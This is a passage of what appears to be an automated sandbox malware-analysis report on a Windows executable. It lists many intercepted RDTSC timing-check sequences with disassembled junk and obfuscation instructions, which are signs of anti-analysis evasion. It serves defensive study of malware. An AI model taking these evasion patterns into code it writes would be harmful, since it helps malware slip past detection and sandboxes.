0x00000075 push ecx 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BCE0E second address: 3BCE14 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BDD69 second address: 3BDD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BDD6D second address: 3BDD73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BDD73 second address: 3BDD78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C4505 second address: 3C452F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2FF4F875F6h 0x00000008 jmp 00007F2FF4F875FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2FF4F87606h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7123 second address: 3C713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F2FF4BC0FC0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C713E second address: 3C7143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7143 second address: 3C715A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F2FF4BC0FC0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CA0CB second address: 3CA0DE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2FF4F875F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2412 second address: 3D246C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2FF4BC0FB6h 0x0000000a jmp 00007F2FF4BC0FC3h 0x0000000f popad 0x00000010 je 00007F2FF4BC0FC9h 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F2FF4BC0FC1h 0x0000001d push eax 0x0000001e jnc 00007F2FF4BC0FB6h 0x00000024 jne 00007F2FF4BC0FB6h 0x0000002a pop eax 0x0000002b popad 0x0000002c push edi 0x0000002d pushad 0x0000002e push edx 0x0000002f pop edx 0x00000030 jmp 00007F2FF4BC0FBCh 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1800 second address: 3D1810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jl 00007F2FF4F875F6h 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1810 second address: 3D1816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1816 second address: 3D181A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1C7C second address: 3D1CAF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2FF4BC0FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F2FF4BC0FBAh 0x00000010 jmp 00007F2FF4BC0FC9h 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1CAF second address: 3D1CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1E39 second address: 3D1E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1E40 second address: 3D1E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1E46 second address: 3D1E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1E4C second address: 3D1E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1F9D second address: 3D1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D1FA1 second address: 3D1FB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jp 00007F2FF4F875F6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D210B second address: 3D2111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2299 second address: 3D229D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D229D second address: 3D22A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6373 second address: 3D6389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2FF4F875F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F2FF4F875F6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D64D3 second address: 3D64E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D64E1 second address: 3D64E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D64E7 second address: 3D64ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D606A second address: 3D6072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6E11 second address: 3D6E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7486 second address: 3D749E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007F2FF4F8761Dh 0x0000000d push ecx 0x0000000e jnp 00007F2FF4F875F6h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE0B3 second address: 3DE0BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE0BD second address: 3DE0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DCE24 second address: 3DCE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2FF4BC0FB6h 0x0000000a pop ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DCE2F second address: 3DCE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DCE35 second address: 3DCE4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2FF4BC0FBBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DCE4F second address: 3DCE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F2FF4F875F6h 0x00000011 jns 00007F2FF4F875F6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DCE66 second address: 3DCE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F2FF4BC0FB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD2A3 second address: 3DD2B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD2B1 second address: 3DD2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD2B5 second address: 3DD2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD5AB second address: 3DD5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2FF4BC0FB6h 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD5B6 second address: 3DD5C0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2FF4F875FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD9CA second address: 3DD9D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD9D7 second address: 3DD9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F875FDh 0x00000009 js 00007F2FF4F875F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DDF3A second address: 3DDF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2FF4BC0FB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35FF47 second address: 35FF7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FCh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F2FF4F87609h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35FF7B second address: 35FF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39FC8D second address: 39FCAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39FCAA second address: 39FCB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F2FF4BC0FB6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39FCB8 second address: 39FCE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b clc 0x0000000c lea eax, dword ptr [ebp+1246F995h] 0x00000012 mov dx, bx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F2FF4F875F6h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39FCE5 second address: 38771F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2FF4BC0FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F2FF4BC0FBFh 0x00000012 call dword ptr [ebp+122D298Eh] 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A012F second address: 203A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov dl, 82h 0x0000000d push dword ptr [ebp+122D0D01h] 0x00000013 jmp 00007F2FF4F87605h 0x00000018 call dword ptr [ebp+122D2DB9h] 0x0000001e pushad 0x0000001f jng 00007F2FF4F875FCh 0x00000025 mov dword ptr [ebp+122D22C7h], ecx 0x0000002b xor eax, eax 0x0000002d jmp 00007F2FF4F87609h 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 pushad 0x00000037 call 00007F2FF4F87605h 0x0000003c jno 00007F2FF4F875F6h 0x00000042 pop eax 0x00000043 add ebx, dword ptr [ebp+122D3938h] 0x00000049 popad 0x0000004a mov dword ptr [ebp+122D3964h], eax 0x00000050 pushad 0x00000051 push edx 0x00000052 sub dword ptr [ebp+122D22C7h], edi 0x00000058 pop ebx 0x00000059 popad 0x0000005a mov esi, 0000003Ch 0x0000005f mov dword ptr [ebp+122D22C7h], ebx 0x00000065 xor dword ptr [ebp+122D22C7h], ecx 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 sub ebx, dword ptr [ebp+122D3768h] 0x00000076 mov dword ptr [ebp+122D22C7h], esi 0x0000007c popad 0x0000007d lodsw 0x0000007f sub dword ptr [ebp+122D22C7h], edx 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 mov dword ptr [ebp+122D22C7h], eax 0x0000008f cld 0x00000090 mov ebx, dword ptr [esp+24h] 0x00000094 cmc 0x00000095 push eax 0x00000096 push ecx 0x00000097 pushad 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A01B8 second address: 3A01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0255 second address: 3A0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0259 second address: 3A029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 63719ED7h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F2FF4BC0FB8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D2DAEh], eax 0x0000002e push 17502F7Eh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A029A second address: 3A02A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A03A8 second address: 3A03AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0CF9 second address: 3A0D07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0D07 second address: 3A0D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0D0B second address: 3A0D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1036 second address: 3A104C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5702 second address: 3E5733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F875FFh 0x00000009 jnp 00007F2FF4F875FAh 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push edx 0x00000015 jmp 00007F2FF4F875FEh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5733 second address: 3E5739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5739 second address: 3E573D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5869 second address: 3E58A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F2FF4BC0FB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F2FF4BC0FC2h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jg 00007F2FF4BC0FC2h 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E59FC second address: 3E5A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5A02 second address: 3E5A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2FF4BC0FC8h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5DD9 second address: 3E5DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5DE1 second address: 3E5DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBAh 0x00000007 jnl 00007F2FF4BC0FB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5DF9 second address: 3E5DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5DFD second address: 3E5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC525 second address: 3EC52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC52B second address: 3EC54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4BC0FC9h 0x00000009 jns 00007F2FF4BC0FB6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC697 second address: 3EC6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87606h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F2FF4F875F8h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EC9FD second address: 3ECA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECA02 second address: 3ECA15 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2FF4F875FEh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEB52 second address: 3EEB56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEB56 second address: 3EEB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEB60 second address: 3EEB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2FF4BC0FB6h 0x0000000a jmp 00007F2FF4BC0FC7h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEB81 second address: 3EEBA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F2FF4F875F6h 0x00000011 jmp 00007F2FF4F875FCh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEBA8 second address: 3EEBAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED16 second address: 3EED2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4F87600h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED2C second address: 3EED3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED3A second address: 3EED4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F2FF4F875FCh 0x0000000e jno 00007F2FF4F875F6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED4E second address: 3EED6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4BC0FC7h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED6B second address: 3EED77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EED77 second address: 3EED7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2F65 second address: 3F2F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
